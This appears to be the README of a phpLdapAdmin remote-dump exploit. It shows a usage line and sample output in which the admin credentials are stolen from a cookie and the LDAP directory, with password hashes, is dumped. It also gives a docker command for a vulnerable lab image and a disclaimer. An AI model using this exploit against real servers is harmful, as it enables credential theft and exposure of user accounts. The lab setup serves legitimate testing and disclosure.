phpLdapAdmin is a Web-based LDAP browser to manage your LDAP server in its last version has a remote vulnerability that when exploited can lead to remote dumping the whole LDAP server, inclusing user accounts and their respective passwords.
To run this exploit run ./ http://host/htdocs/
(or the directory
containing the cmd.php
file). Example:
./ http://localhost:9999/htdocs/
[+] phpLdap remote exploit by OPSXCQ
Get the source code at
[+] Trying to get the cookie value from http://localhost:9999/htdocs/
[*] Login stolen cn=admin,dc=vulnerable,dc=strm,dc=sh with password admin
[+] Logging in with the stolen credentials
[+] Dumping the database to CSV
"dc=vulnerable,dc=strm,dc=sh","vulnerable","","top | dcObject | organization","","","","","","","","","",""
"cn=admin,dc=vulnerable,dc=strm,dc=sh","","","simpleSecurityObject | organizationalRole","admin","LDAP administrator","{SSHA}QUtf9EKvsgZbnYJt9cTd61qp1OPeu8An","","","","","","",""
"cn=users,dc=vulnerable,dc=strm,dc=sh","","","posixGroup | top","users","","","500","","","","","",""
"cn=Joe Hack,cn=users,dc=vulnerable,dc=strm,dc=sh","","","inetOrgPerson | posixAccount | top","Joe Hack","","{MD5}I7QiLSYTonZdTUMtLWXojg==","500","Joe","/home/users/jhack","/bin/bash","Hack","jhack","1000"
To simulate this attack you can use a vulnerable docker image. If you have docker installed, just run:
docker run --rm -it -p 80:80 vulnerables/phpldapadmin-remote-dump
This vulnerability was disclosed by @le_keksec on twitter and their exploit code is included in this repo, and also can be found here.
This or previous program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (opsxcq) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears NO responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not opsxcq's responsibility.